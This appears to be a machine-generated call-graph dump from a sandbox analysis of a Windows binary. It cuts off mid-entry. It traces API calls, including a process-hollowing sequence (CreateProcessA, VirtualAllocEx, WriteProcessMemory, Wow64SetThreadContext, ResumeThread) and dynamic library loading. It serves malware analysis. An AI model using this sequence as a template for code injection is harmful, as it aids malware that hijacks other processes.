6cefd579 SafeArrayCreateVector SafeArrayCreateVector SafeArrayAccessData 59351->59354 59355 6cefd5ec SafeArrayPutElement 59351->59355 59356 6cefd5d6 SafeArrayUnaccessData 59351->59356 59357 6cefd633 SafeArrayPutElement VariantClear 59351->59357 59359 6cefd6fa SafeArrayDestroy 59351->59359 59360 6cefd75d 59351->59360 59361 6ceedb30 5 API calls 59351->59361 59362 6cef56b0 83 API calls 59351->59362 59363 6cef6880 9 API calls 59351->59363 59364 6cf39d2c 66 API calls 2 library calls 59351->59364 59352->59351 59352->59360 59353->59351 59354->59351 59355->59351 59356->59355 59357->59351 59359->59351 59360->59347 59361->59351 59362->59351 59363->59351 59364->59351 59365 532b908 59366 532b92b 59365->59366 59374 5b00eb3 59366->59374 59379 5b00f14 59366->59379 59384 5b01568 59366->59384 59367 532b943 59389 5b026f8 59367->59389 59418 5b026dc 59367->59418 59368 532b985 59375 5b00eb8 59374->59375 59376 5b019c1 59375->59376 59447 532b9a1 59375->59447 59451 532b9a8 59375->59451 59376->59367 59380 5b00f15 59379->59380 59381 5b019c1 59380->59381 59382 532b9a1 327 API calls 59380->59382 59383 532b9a8 327 API calls 59380->59383 59381->59367 59382->59381 59383->59381 59385 5b015b6 59384->59385 59386 5b019c1 59385->59386 59387 532b9a1 327 API calls 59385->59387 59388 532b9a8 327 API calls 59385->59388 59386->59367 59387->59386 59388->59386 59390 5b0272b 59389->59390 59498 532bd30 59390->59498 59502 532bd24 59390->59502 59391 5b028de 59399 5b029cb 59391->59399 59406 532c230 Wow64SetThreadContext 59391->59406 59407 532c229 Wow64SetThreadContext 59391->59407 59392 5b02a0c 59408 532c330 VirtualAllocEx 59392->59408 59409 532c328 VirtualAllocEx 59392->59409 59393 5b02a45 59393->59399 59400 532c450 WriteProcessMemory 59393->59400 59401 532c449 WriteProcessMemory 59393->59401 59394 5b02cbb 59395 5b02d0f 59394->59395 59414 532c230 Wow64SetThreadContext 59394->59414 59415 532c229 Wow64SetThreadContext 59394->59415 59412 532c450 WriteProcessMemory 59395->59412 59413 532c449 WriteProcessMemory 59395->59413 59396 5b02b54 59396->59394 59416 532c450 WriteProcessMemory 59396->59416 59417 532c449 WriteProcessMemory 59396->59417 59397 5b02da8 59398 5b02df3 59397->59398 59402 532c230 Wow64SetThreadContext 59397->59402 59403 532c229 Wow64SetThreadContext 59397->59403 59404 532c5a0 ResumeThread 59398->59404 59405 532c5a8 ResumeThread 59398->59405 59399->59368 59400->59396 59401->59396 59402->59398 59403->59398 59404->59399 59405->59399 59406->59392 59407->59392 59408->59393 59409->59393 59412->59397 59413->59397 59414->59395 59415->59395 59416->59396 59417->59396 59419 5b0272b 59418->59419 59437 532bd30 CreateProcessA 59419->59437 59438 532bd24 CreateProcessA 59419->59438 59420 5b028de 59428 5b029cb 59420->59428 59506 532c230 59420->59506 59509 532c229 59420->59509 59421 5b02a0c 59513 532c328 59421->59513 59517 532c330 59421->59517 59422 5b02a45 59422->59428 59520 532c450 59422->59520 59524 532c449 59422->59524 59423 5b02cbb 59424 5b02d0f 59423->59424 59441 532c230 Wow64SetThreadContext 59423->59441 59442 532c229 Wow64SetThreadContext 59423->59442 59439 532c450 WriteProcessMemory 59424->59439 59440 532c449 WriteProcessMemory 59424->59440 59425 5b02b54 59425->59423 59443 532c450 WriteProcessMemory 59425->59443 59444 532c449 WriteProcessMemory 59425->59444 59426 5b02da8 59427 5b02df3 59426->59427 59429 532c230 Wow64SetThreadContext 59426->59429 59430 532c229 Wow64SetThreadContext 59426->59430 59528 532c5a0 59427->59528 59531 532c5a8 59427->59531 59428->59368 59429->59427 59430->59427 59437->59420 59438->59420 59439->59426 59440->59426 59441->59424 59442->59424 59443->59425 59444->59425 59448 532b9a8 59447->59448 59455 6cf03eb0 59448->59455 59449 532ba3c 59449->59376 59452 532ba13 59451->59452 59454 6cf03eb0 327 API calls 59452->59454 59453 532ba3c 59453->59376 59454->59453 59456 6cf39bb5 77 API calls 59455->59456 59457 6cf03f11 59456->59457 59458 6cf39bb5 77 API calls 59457->59458 59459 6cf03f36 59458->59459 59460 6cee5050 77 API calls 59459->59460 59461 6cf03f50 59460->59461 59462 6cf39bb5 77 API calls 59461->59462 59463 6cf03f57 59462->59463 59464 6cee5050 77 API calls 59463->59464 59465 6cf03f71 59464->59465 59466 6cf39bb5 77 API calls 59465->59466 59467 6cf03f78 59466->59467 59468 6cee5050 77 API calls 59467->59468 59469 6cf03f92 59468->59469 59470 6cf39bb5 77 API calls 59469->59470 59471 6cf03fab 59470->59471 59472 6cf04031 59471->59472 59473 6cf03fb2 59471->59473 59496 6cf39533 66 API calls std::exception::_Copy_str 59472->59496 59475 6cee16b0 327 API calls 59473->59475 59480 6cf03fdc moneypunct 59475->59480 59476 6cf04047 59497 6cf3ac75 RaiseException 59476->59497 59478 6cf0405e 59479 6cf39bb5 77 API calls 59478->59479 59481 6cf040b5 59479->59481 59480->59449 59482 6cf39bb5 77 API calls 59481->59482 59483 6cf040d8 59482->59483 59484 6cee5050 77 API calls 59483->59484 59485 6cf040f2 59484->59485 59486 6cf39bb5 77 API calls 59485->59486 59487 6cf040f9 59486->59487 59488 6cee5050 77 API calls 59487->59488 59489 6cf04113 59488->59489 59490 6cf39bb5 77 API calls 59489->59490 59491 6cf0411a 59490->59491 59492 6cee5050 77 API calls 59491->59492 59493 6cf04134 59492->59493 59494 6cee16b0 327 API calls 59493->59494 59495 6cf04169 moneypunct 59494->59495 59495->59449 59496->59476 59497->59478 59500 532bdae CreateProcessA 59498->59500 59501 532c014 59500->59501 59504 532bdae CreateProcessA 59502->59504 59505 532c014 59504->59505 59507 532c278 Wow64SetThreadContext 59506->59507 59508 532c2cd 59507->59508 59508->59421 59510 532c230 Wow64SetThreadContext 59509->59510 59512 532c2cd 59510->59512 59512->59421 59514 532c330 VirtualAllocEx 59513->59514 59516 532c3ee 59514->59516 59516->59422 59518 532c378 VirtualAllocEx 59517->59518 59519 532c3ee 59518->59519 59519->59422 59521 532c4a0 WriteProcessMemory 59520->59521 59523 532c537 59521->59523 59523->59425 59525 532c4a0 WriteProcessMemory 59524->59525 59527 532c537 59525->59527 59527->59425 59529 532c5ed ResumeThread 59528->59529 59530 532c637 59529->59530 59530->59428 59532 532c5ed ResumeThread 59531->59532 59533 532c637 59532->59533 59533->59428 58066 2d5bb98 58067 2d5bbaf 58066->58067 58068 2d5bbb6 58066->58068 58067->58068 58071 5321b2b 58067->58071 58076 5321b38 58067->58076 58072 5321b5c 58071->58072 58073 5321b66 58071->58073 58072->58073 58081 53220b0 58072->58081 58089 53220c0 58072->58089 58073->58068 58077 5321b66 58076->58077 58078 5321b5c 58076->58078 58077->58068 58078->58077 58079 53220b0 329 API calls 58078->58079 58080 53220c0 329 API calls 58078->58080 58079->58077 58080->58077 58082 53220e7 58081->58082 58097 5322173 58082->58097 58103 5322178 58082->58103 58083 532211b 58109 53228c0 58083->58109 58113 53228c8 58083->58113 58084 532215a 58084->58073 58090 53220e7 58089->58090 58093 5322173 2 API calls 58090->58093 58094 5322178 2 API calls 58090->58094 58091 532211b 58095 53228c0 327 API calls 58091->58095 58096 53228c8 327 API calls 58091->58096 58092 532215a 58092->58073 58093->58091 58094->58091 58095->58092 58096->58092 58098 5322178 58097->58098 58117 53222da 58098->58117 58121 53221c9 58098->58121 58127 53221d8 58098->58127 58099 532219d 58099->58083 58104 5322192 58103->58104 58106 53222da LoadLibraryW 58104->58106 58107 53221d8 2 API calls 58104->58107 58108 53221c9 2 API calls 58104->58108 58105 532219d 58105->58083 58106->58105 58107->58105 58108->58105 58110 532290c 58109->58110 58141 6cf02ed0 58110->58141 58111 5322953 58111->58084 58114 532290c 58113->58114 58116 6cf02ed0 327 API calls 58114->58116 58115 5322953 58115->58084 58116->58115 58119 532228a 58117->58119 58118 5322371 58118->58099 58119->58118 58133 53207cc 58119->58133 58122 53221f4 58121->58122 58137 53207c0 58122->58137 58124 5322371 58124->58099 58125 53207cc LoadLibraryW 58126 5322243 58125->58126 58126->58124 58126->58125 58128 53221f4 58127->58128 58129 53207c0 LoadLibraryW 58128->58129 58132 5322243 58129->58132 58130 5322371 58130->58099 58131 53207cc LoadLibraryW 58131->58132 58132->58130 58132->58131 58134 5322390 LoadLibraryW 58133->58134 58136 532243c 58134->58136 58136->58119 58138 5322390 LoadLibraryW 58137->58138 58140 532243c 58138->58140 58140->58126 58142 6cf02f09 58141->58142 58162 6cf03006 moneypunct 58141->58162 58163 6cf39bb5 58142->58163 58145 6cf39bb5 77 API calls 58146 6cf02f54 58145->58146 58175 6cee5050 58146->58175 58148 6cf02f6e 58149 6cf39bb5 77 API calls 58148->58149 58150 6cf02f75 58149->58150 58151 6cee5050 77 API calls 58150->58151 58152 6cf02f8f 58151->58152 58153 6cf39bb5 77 API calls 58152->58153 58154 6cf02f96 58153->58154 58155 6cee5050 77 API calls 58154->58155 58156 6cf02fb0 58155->58156 58157 6cf39bb5 77 API calls 58156->58157 58158 6cf02fb7 58157->58158 58159 6cee5050 77 API calls 58158->58159 58160 6cf02fd1 58159->58160 58183 6cee16b0 58160->58183 58162->58111 58166 6cf39bbf 58163->58166 58165 6cf02f31 58165->58145 58166->58165 58170 6cf39bdb std::exception::exception 58166->58170 58247 6cf39d66 58166->58247 58264 6cf3c86e DecodePointer 58166->58264 58168 6cf39c19 58266 6cf395c1 66 API calls std::exception::operator= 58168->58266 58170->58168 58265 6cf39af4 76 API calls __cinit 58170->58265 58171 6cf39c23 58267 6cf3ac75 RaiseException 58171->58267 58174 6cf39c34 58176 6cee505d 58175->58176 58177 6cee5091 58175->58177 58176->58177 58178 6cee5066 58176->58178 58180 6cee509d 58177->58180 58277 6cee5110 77 API calls std::_Xinvalid_argument 58177->58277 58182 6cee507a 58178->58182 58276 6cee5110 77 API calls std::_Xinvalid_argument 58178->58276 58180->58148 58182->58148 58184 6cf39bb5 77 API calls 58183->58184 58185 6cee1706 58184->58185 58186 6cee1c39 58185->58186 58187 6cee1711 58185->58187 58330 6cf39533 66 API calls std::exception::_Copy_str 58186->58330 58278 6cee2d70 58187->58278 58191 6cee1c48 58331 6cf3ac75 RaiseException 58191->58331 58193 6cee2d70 77 API calls 58195 6cee1788 58193->58195 58194 6cee1c5d 58196 6cee2d70 77 API calls 58195->58196 58197 6cee17a9 58196->58197 58198 6cee2d70 77 API calls 58197->58198 58199 6cee17ca 58198->58199 58200 6cee2d70 77 API calls 58199->58200 58201 6cee17e6 58200->58201 58202 6cee2d70 77 API calls 58201->58202 58203 6cee182f 58202->58203 58204 6cee2d70 77 API calls 58203->58204 58205 6cee1878 58204->58205 58206 6cee2d70 77 API calls 58205->58206 58207 6cee18c6 58206->58207 58208 6cee2d70 77 API calls 58207->58208 58209 6cee18e7 58208->58209 58210 6cee2d70 77 API calls 58209->58210 58211 6cee1900 58210->58211 58212 6cee2d70 77 API calls 58211->58212 58213 6cee1946 58212->58213 58214 6cee2d70 77 API calls 58213->58214 58215 6cee198f 58214->58215 58216 6cee2d70 77 API calls 58215->58216 58217 6cee19d3 58216->58217 58218 6cee2d70 77 API calls 58217->58218 58219 6cee1a05 58218->58219 58286 6cee3b30 58219->58286 58222 6cee2d70 77 API calls 58223 6cee1a21 58222->58223 58224 6cee2d70 77 API calls 58223->58224 58225 6cee1a82 58224->58225 58295 6cee3bd0 58225->58295 58228 6cee2d70 77 API calls 58229 6cee1a9e 58228->58229 58230 6cee2d70 77 API calls 58229->58230 58231 6cee1aec 58230->58231 58304 6cee2a80 58231->58304 58233 6cee1b4c 58234 6cee1b62 58233->58234 58327 6cf3919e 67 API calls 3 library calls 58233->58327 58310 6cf042e0 58234->58310 58314 6cee6850 58234->58314 58318 6cee69e0 58234->58318 58322 6cf030c0 58234->58322 58235 6cee1b58 58328 6cf39125 67 API calls 2 library calls 58235->58328 58239 6cee1b00 58239->58233 58239->58235 58240 6cee1b6d moneypunct 58239->58240 58326 6cee2e60 77 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 58239->58326 58329 6cee3530 67 API calls 58240->58329 58242 6cee1ba1 moneypunct 58242->58162 58248 6cf39de3 58247->58248 58255 6cf39d74 58247->58255 58274 6cf3c86e DecodePointer 58248->58274 58250 6cf39de9 58275 6cf3d7d8 66 API calls __getptd_noexit 58250->58275 58253 6cf39da2 RtlAllocateHeap 58253->58255 58263 6cf39ddb 58253->58263 58255->58253 58256 6cf39dcf 58255->58256 58260 6cf39d7f 58255->58260 58261 6cf39dcd 58255->58261 58271 6cf3c86e DecodePointer 58255->58271 58272 6cf3d7d8 66 API calls __getptd_noexit 58256->58272 58260->58255 58268 6cf3d74e 66 API calls __NMSG_WRITE 58260->58268 58269 6cf3d59f 66 API calls 6 library calls 58260->58269 58270 6cf3d279 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 58260->58270 58273 6cf3d7d8 66 API calls __getptd_noexit 58261->58273 58263->58166 58264->58166 58265->58168 58266->58171 58267->58174 58268->58260 58269->58260 58271->58255 58272->58261 58273->58263 58274->58250 58275->58263 58276->58182 58277->58180 58279 6cee2db8 58278->58279 58285 6cee2e0d 58279->58285 58340 6ced5a30 77 API calls 2 library calls 58279->58340 58281 6cee2e02 58341 6cee3cc0 67 API calls 58281->58341 58284 6cee1746 58284->58193 58332 6cf3948b 58285->58332 58287 6cee3b3d 58286->58287 58288 6cf39bb5 77 API calls 58287->58288 58289 6cee3b6f 58288->58289 58290 6cee1a0c 58289->58290 58343 6cf39533 66 API calls std::exception::_Copy_str 58289->58343 58290->58222 58292 6cee3bae 58344 6cf3ac75 RaiseException 58292->58344 58294 6cee3bc3 58296 6cee3bdd 58295->58296 58297 6cf39bb5 77 API calls 58296->58297 58298 6cee3c0f 58297->58298 58299 6cee1a89 58298->58299 58345 6cf39533 66 API calls std::exception::_Copy_str 58298->58345 58299->58228 58301 6cee3c4e 58346 6cf3ac75 RaiseException 58301->58346 58303 6cee3c63 58305 6cee2acd 58304->58305 58309 6cee2ae6 58304->58309 58306 6cee2adf 58305->58306 58347 6cf390d8 67 API calls 2 library calls 58305->58347 58348 6cee31e0 77 API calls 2 library calls 58306->58348 58309->58239 58311 6cf0431d 58310->58311 58312 6cf042fe 58310->58312 58311->58240 58349 6cee62c0 58312->58349 58315 6cee686e 58314->58315 58316 6cee6890 58314->58316 58376 6cee8bc0 58315->58376 58316->58240 58319 6cee6a1f 58318->58319 58320 6cee69fe 58318->58320 58319->58240 58558 6cee9110 58320->58558 58323 6cf030de 58322->58323 58324 6cf030f8 58322->58324 58683 6cee5fa0 58323->58683 58324->58240 58326->58239 58327->58235 58328->58234 58329->58242 58330->58191 58331->58194 58333 6cf39493 58332->58333 58334 6cf39495 IsDebuggerPresent 58332->58334 58333->58284 58342 6cf40036 58334->58342 58337 6cf3ce7e SetUnhandledExceptionFilter UnhandledExceptionFilter 58338 6cf3cea3 GetCurrentProcess TerminateProcess 58337->58338 58339 6cf3ce9b __call_reportfault 58337->58339 58338->58284 58339->58338 58340->58281 58341->58285 58342->58337 58343->58292 58344->58294 58345->58301 58346->58303 58347->58306 58348->58309 58350 6cf39bb5 77 API calls 58349->58350 58351 6cee632b 58350->58351 58352 6cf39bb5 77 API calls 58351->58352 58353 6cee6350 58352->58353 58354 6cee5050 77 API calls 58353->58354 58355 6cee636e 58354->58355 58356 6cf39bb5 77 API calls 58355->58356 58357 6cee6375 58356->58357 58358 6cee5050 77 API calls 58357->58358 58359 6cee6392 58358->58359 58360 6cf39bb5 77 API calls 58359->58360 58361 6cee6399 58360->58361 58362 6cee5050 77 API calls 58361->58362 58363 6cee63b3 58362->58363 58364 6cf39bb5 77 API calls 58363->58364 58365 6cee63c9 58364->58365 58366 6cee6459 58365->58366 58367 6cee63d4 58365->58367 58374 6cf39533 66 API calls std::exception::_Copy_str 58366->58374 58369 6cee16b0 327 API calls 58367->58369 58373 6cee6402 moneypunct 58369->58373 58370 6cee646b 58375 6cf3ac75 RaiseException 58370->58375 58372 6cee6482 58373->58311 58374->58370 58375->58372 58377 6cee8bcc 58376->58377 58378 6cee8bd5 EnterCriticalSection 58376->58378 58377->58316 58386 6cefe030 58378->58386 58382 6cee8c13 LeaveCriticalSection 58382->58316 58387 6cefe05d 58386->58387 58388 6cefe090 58386->58388 58390 6cf39bb5 77 API calls 58387->58390 58391 6cee8bec 58387->58391 58389 6cf39bb5 77 API calls 58388->58389 58389->58391 58390->58391 58392 6ceeb6c0 GetModuleHandleW 58391->58392 58393 6ceeb72a GetProcAddress 58392->58393 58394 6ceeb717 LoadLibraryW 58392->58394 58395 6ceeb94c 58393->58395 58398 6ceeb73e 58393->58398 58394->58393 58394->58395 58396 6cf3948b __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 58395->58396 58397 6cee8bfa 58396->58397 58397->58382 58405 6cee8c40 58397->58405 58398->58395 58399 6ceeb85d 58398->58399 58419 6cf3a116 80 API calls __mbstowcs_s_l 58399->58419 58401 6ceeb875 GetModuleHandleW 58401->58395 58402 6ceeb8aa GetProcAddress 58401->58402 58402->58395 58404 6ceeb8f2 58402->58404 58404->58395 58420 6ceea350 VariantInit VariantInit VariantInit 58405->58420 58406 6cee8c63 58407 6cee8cf9 58406->58407 58430 6cee8b10 EnterCriticalSection 58406->58430 58407->58382 58409 6cee8c83 58410 6cee8ce2 58409->58410 58411 6cee8c9f 58409->58411 58439 6ceeb9a0 58409->58439 58410->58382 58447 6ceebab0 58411->58447 58414 6cee8cd3 58414->58410 58463 6cee8ff0 69 API calls std::tr1::_Xweak 58414->58463 58419->58401 58423 6ceea3b5 58420->58423 58421 6ceea505 VariantClear VariantClear VariantClear 58422 6ceea52a 58421->58422 58422->58406 58423->58421 58424 6ceea3e0 VariantCopy 58423->58424 58425 6ceea3ff VariantClear 58424->58425 58426 6ceea3f9 58424->58426 58427 6ceea413 58425->58427 58426->58425 58427->58421 58428 6ceea549 VariantClear VariantClear VariantClear 58427->58428 58429 6ceea57a 58428->58429 58429->58406 58431 6cee8b4b 58430->58431 58432 6cee8b53 LeaveCriticalSection 58431->58432 58434 6cf39bb5 77 API calls 58431->58434 58432->58409 58435 6cee8b64 58434->58435 58436 6cee8b80 58435->58436 58464 6cee7370 79 API calls 2 library calls 58435->58464 58465 6cee96d0 77 API calls 58436->58465 58441 6ceeb9dc 58439->58441 58440 6ceeba7a 58440->58411 58441->58440 58442 6cf39bb5 77 API calls 58441->58442 58443 6ceeba3a 58442->58443 58444 6ceeba6a 58443->58444 58510 6cef5f00 77 API calls 2 library calls 58443->58510 58466 6cef6fd0 58444->58466 58511 6cefb580 58447->58511 58449 6ceebaf3 58453 6cee8cbd 58449->58453 58516 6ceeaf30 VariantInit VariantInit VariantInit 58449->58516 58451 6ceebb0d 58452 6cf39bb5 77 API calls 58451->58452 58451->58453 58452->58453 58453->58410 58454 6cee8d60 EnterCriticalSection 58453->58454 58536 6cee9750 58454->58536 58457 6cee8e0a 58457->58414 58458 6cee8d97 58458->58457 58459 6cee8de5 58458->58459 58538 6ceebdf7 58458->58538 58548 6cee8e20 58459->58548 58461 6cee8e02 58461->58414 58463->58410 58464->58436 58465->58432 58469 6cef700a 58466->58469 58509 6cef78c2 58466->58509 58467 6cf3948b __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 58468 6cef8326 58467->58468 58468->58440 58470 6ceed920 SafeArrayCreateVector SafeArrayPutElement SafeArrayDestroy 58469->58470 58469->58509 58471 6cef78b5 58470->58471 58472 6ceed920 SafeArrayCreateVector SafeArrayPutElement SafeArrayDestroy 58471->58472 58471->58509 58473 6cef7920 58472->58473 58474 6ceed920 SafeArrayCreateVector SafeArrayPutElement SafeArrayDestroy 58473->58474 58473->58509 58475 6cef7986 58474->58475 58476 6cef79df 58475->58476 58477 6ceed920 SafeArrayCreateVector SafeArrayPutElement SafeArrayDestroy 58475->58477 58478 6ceed9f0 SafeArrayCreateVector SafeArrayPutElement SafeArrayDestroy 58476->58478 58476->58509 58477->58476 58479 6cef7a7b 58478->58479 58480 6ceed9f0 SafeArrayCreateVector SafeArrayPutElement SafeArrayDestroy 58479->58480 58479->58509 58481 6cef7acb 58480->58481 58482 6ceed9f0 SafeArrayCreateVector SafeArrayPutElement SafeArrayDestroy 58481->58482 58481->58509 58483 6cef7b19 58482->58483 58484 6ceed9f0 SafeArrayCreateVector SafeArrayPutElement SafeArrayDestroy 58483->58484 58483->58509 58485 6cef7b90 58484->58485 58486 6ceed9f0 SafeArrayCreateVector SafeArrayPutElement SafeArrayDestroy 58485->58486 58485->58509 58487 6cef7c0b 58486->58487 58488 6ceed9f0 SafeArrayCreateVector SafeArrayPutElement SafeArrayDestroy 58487->58488 58487->58509 58489 6cef7ca5 58488->58489 58490 6ceed9f0 SafeArrayCreateVector SafeArrayPutElement SafeArrayDestroy 58489->58490 58489->58509 58491 6cef7d3f 58490->58491 58492 6ceed9f0 SafeArrayCreateVector SafeArrayPutElement SafeArrayDestroy 58491->58492 58491->58509 58493 6cef7dbb 58492->58493 58494 6ceed9f0 SafeArrayCreateVector SafeArrayPutElement SafeArrayDestroy 58493->58494 58493->58509 58495 6cef7e44 58494->58495 58496 6ceed9f0 SafeArrayCreateVector SafeArrayPutElement SafeArrayDestroy 58495->58496 58495->58509 58497 6cef7eb5 58496->58497 58498 6ceed9f0 SafeArrayCreateVector SafeArrayPutElement SafeArrayDestroy 58497->58498 58497->58509 58499 6cef7f6e 58498->58499 58500 6ceed9f0 SafeArrayCreateVector SafeArrayPutElement SafeArrayDestroy 58499->58500 58499->58509 58501 6cef8081 58500->58501 58502 6ceed9f0 SafeArrayCreateVector SafeArrayPutElement SafeArrayDestroy 58501->58502 58501->58509 58503 6cef80ca 58502->58503 58504 6ceed9f0 SafeArrayCreateVector SafeArrayPutElement SafeArrayDestroy 58503->58504 58503->58509 58505 6cef80f9 58504->58505 58506 6ceed9f0 SafeArrayCreateVector SafeArrayPutElement SafeArrayDestroy 58505->58506 58505->58509 58507 6cef8175 58506->58507 58508 6ceed9f0 SafeArrayCreateVector SafeArrayPutElement SafeArrayDestroy 58507->58508 58507->58509 58508->58509 58509->58467 58510->58444 58512 6cefb5cb VariantInit VariantInit 58511->58512 58513 6cefb5b5 58511->58513 58515 6cefb5ee 58512->58515 58513->58449 58514 6cefb675 VariantClear VariantClear 58514->58449 58515->58514 58519 6ceeaf97 58516->58519 58517 6ceeb22c VariantClear VariantClear VariantClear 58518 6ceeb254 58517->58518 58518->58451 58519->58517 58520 6ceeaffe VariantCopy 58519->58520 58521 6ceeb01d VariantClear 58520->58521 58522 6ceeb017 58520->58522 58523 6ceeb035 58521->58523 58522->58521 58523->58517 58524 6cf39bb5 77 API calls 58523->58524 58525 6ceeb0ae 58524->58525 58526 6cf3a136 __NMSG_WRITE 66 API calls 58525->58526 58527 6ceeb108 58526->58527 58528 6ceeb28d VariantClear VariantClear VariantClear 58527->58528 58529 6ceeb190 SafeArrayGetLBound SafeArrayGetUBound 58527->58529 58533 6ceeb1fd moneypunct 58527->58533 58530 6ceeb2ba 58528->58530 58531 6ceeb1bf SafeArrayAccessData 58529->58531 58532 6ceeb28b 58529->58532 58530->58451 58531->58532 58534 6ceeb1d3 _memmove 58531->58534 58532->58528 58533->58517 58535 6ceeb1eb SafeArrayUnaccessData 58534->58535 58535->58532 58535->58533 58537 6cee8d88 LeaveCriticalSection 58536->58537 58537->58457 58537->58458 58539 6ceebe01 58538->58539 58540 6ceebe2c SafeArrayDestroy 58539->58540 58541 6ceebe33 58539->58541 58540->58541 58543 6ceebe6a IsBadReadPtr 58541->58543 58546 6ceebefd moneypunct 58541->58546 58547 6ceebe77 58541->58547 58542 6ceeaf30 92 API calls 58542->58546 58543->58547 58544 6cf3948b __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 58545 6ceec00f 58544->58545 58545->58459 58546->58544 58547->58542 58549 6cee8e39 58548->58549 58550 6cee8e7c EnterCriticalSection 58549->58550 58556 6cee8f7f moneypunct 58549->58556 58551 6cee8e9e 58550->58551 58552 6cee8eac LeaveCriticalSection 58551->58552 58553 6cee8ebd 58552->58553 58552->58556 58554 6cf39bb5 77 API calls 58553->58554 58555 6cee8ec4 _memset 58554->58555 58557 6ceec020 246 API calls 58555->58557 58556->58461 58557->58556 58559 6cee912c EnterCriticalSection 58558->58559 58560 6cee9121 58558->58560 58561 6cee9150 58559->58561 58560->58319 58562 6cee915b LeaveCriticalSection 58561->58562 58563 6cee916a EnterCriticalSection 58562->58563 58564 6cee923f 58562->58564 58565 6cee9185 58563->58565 58564->58319 58566 6cee9190 LeaveCriticalSection 58565->58566 58566->58564 58567 6cee91a1 58566->58567 58574 6cef6b10 58567->58574 58578 6cef6b64 58574->58578 58575 6cef6f19 InterlockedCompareExchange 58577 6cee91f3 58575->58577 58577->58564 58645 6cee9840 58577->58645 58578->58575 58660 6cf02e20 58578->58660 58580 6cef6f12 SafeArrayDestroy 58580->58575 58581 6cef6bc2 58581->58575 58644 6cef6edd 58581->58644 58663 6cf028c0 InterlockedCompareExchange 58581->58663 58583 6cef6c6b 58583->58575 58584 6cef6c7e SafeArrayGetLBound 58583->58584 58583->58644 58585 6cef6c99 SafeArrayGetUBound 58584->58585 58584->58644 58586 6cef6cb4 SafeArrayAccessData 58585->58586 58585->58644 58587 6cef6cd5 58586->58587 58586->58644 58664 6cef5760 67 API calls std::tr1::_Xweak 58587->58664 58589 6cef6cf5 SafeArrayUnaccessData 58590 6cef6d07 58589->58590 58589->58644 58590->58644 58665 6cee1690 77 API calls 58590->58665 58592 6cef6d2c 58593 6cf39bb5 77 API calls 58592->58593 58594 6cef6d3f 58593->58594 58595 6cee5050 77 API calls 58594->58595 58596 6cef6d59 58595->58596 58597 6cf39bb5 77 API calls 58596->58597 58598 6cef6d63 58597->58598 58599 6cee5050 77 API calls 58598->58599 58600 6cef6d7f 58599->58600 58601 6cf39bb5 77 API calls 58600->58601 58602 6cef6d86 58601->58602 58603 6cee5050 77 API calls 58602->58603 58604 6cef6da0 58603->58604 58666 6cee50c0 77 API calls 58604->58666 58606 6cef6dab 58607 6cf39bb5 77 API calls 58606->58607 58608 6cef6db2 58607->58608 58609 6cee5050 77 API calls 58608->58609 58610 6cef6dcf 58609->58610 58667 6cee50c0 77 API calls 58610->58667 58612 6cef6dda 58613 6cf39bb5 77 API calls 58612->58613 58614 6cef6de7 58613->58614 58615 6cee5050 77 API calls 58614->58615 58616 6cef6e01 58615->58616 58668 6cee50c0 77 API calls 58616->58668 58618 6cef6e0c 58619 6cf39bb5 77 API calls 58618->58619 58620 6cef6e19 58619->58620 58621 6cee5050 77 API calls 58620->58621 58622 6cef6e33 58621->58622 58623 6cf39bb5 77 API calls 58622->58623 58624 6cef6e3a 58623->58624 58625 6cee5050 77 API calls 58624->58625 58626 6cef6e58 58625->58626 58627 6cf39bb5 77 API calls 58626->58627 58628 6cef6e5f 58627->58628 58629 6cee5050 77 API calls 58628->58629 58630 6cef6e79 58629->58630 58669 6cee50c0 77 API calls 58630->58669 58632 6cef6e84 58670 6cee50c0 77 API calls 58632->58670 58634 6cef6e8f 58635 6cf39bb5 77 API calls 58634->58635 58636 6cef6e9b 58635->58636 58637 6cee5050 77 API calls 58636->58637 58638 6cef6eb5 58637->58638 58671 6cee50c0 77 API calls 58638->58671 58640 6cef6ec0 58672 6cee50c0 77 API calls 58640->58672 58642 6cef6ecb 58673 6cee2a40 327 API calls 58642->58673 58644->58575 58644->58580 58646 6cf39bb5 77 API calls 58645->58646 58647 6cee9865 58646->58647 58648 6cee9227 58647->58648 58674 6cf39533 66 API calls std::exception::_Copy_str 58647->58674 58653 6cee7140 58648->58653 58650 6cee98ab 58675 6cf3ac75 RaiseException 58650->58675 58652 6cee98c0 58676 6cf02820 58653->58676 58655 6cee71d7 58656 6cee71f8 58655->58656 58682 6cf39d2c 66 API calls 2 library calls 58655->58682 58656->58319 58658 6cee719c 58658->58655 58681 6cf3919e 67 API calls 3 library calls 58658->58681 58661 6cf02e67 58660->58661 58661->58581 58662 6cf02e9f InterlockedCompareExchange 58661->58662 58662->58581 58663->58583 58664->58589 58665->58592 58666->58606 58667->58612 58668->58618 58669->58632 58670->58634 58671->58640 58672->58642 58673->58644 58674->58650 58675->58652 58677 6cf02845 58676->58677 58678 6cf028af 58677->58678 58679 6cf39d66 _malloc 66 API calls 58677->58679 58678->58658 58680 6cf02876 58679->58680 58680->58658 58681->58655 58682->58656 58684 6cf39bb5 77 API calls 58683->58684 58685 6cee6003 58684->58685 58686 6cf39bb5 77 API calls 58685->58686 58687 6cee6028 58686->58687 58688 6cee5050 77 API calls 58687->58688 58689 6cee6042 58688->58689 58690 6cf39bb5 77 API calls 58689->58690 58691 6cee6049 58690->58691 58692 6cee5050 77 API calls 58691->58692 58693 6cee6067 58692->58693 58694 6cf39bb5 77 API calls 58693->58694 58695 6cee606e 58694->58695 58696 6cee5050 77 API calls 58695->58696 58697 6cee608b 58696->58697 58698 6cf39bb5 77 API calls 58697->58698 58699 6cee6092 58698->58699 58700 6cee5050 77 API calls 58699->58700 58701 6cee60ac 58700->58701 58702 6cee16b0 327 API calls 58701->58702 58703 6cee60de moneypunct 58702->58703 58703->58324 58704 6cf3a42d 58706 6cf3a438 58704->58706 58707 6cf3a4b8 _raise 58704->58707 58705 6cf3a468 58705->58707 58710 6cf3a2ab __CRT_INIT@12 149 API calls 58705->58710 58711 6cf3a498 58705->58711 58706->58705 58706->58707 58712 6cf3a2ab 58706->58712 58709 6cf3a2ab __CRT_INIT@12 149 API calls 58709->58707 58710->58711 58711->58707 58711->58709 58713 6cf3a2b7 _raise 58712->58713 58714 6cf3a339 58713->58714 58715 6cf3a2bf 58713->58715 58717 6cf3a39a 58714->58717 58718 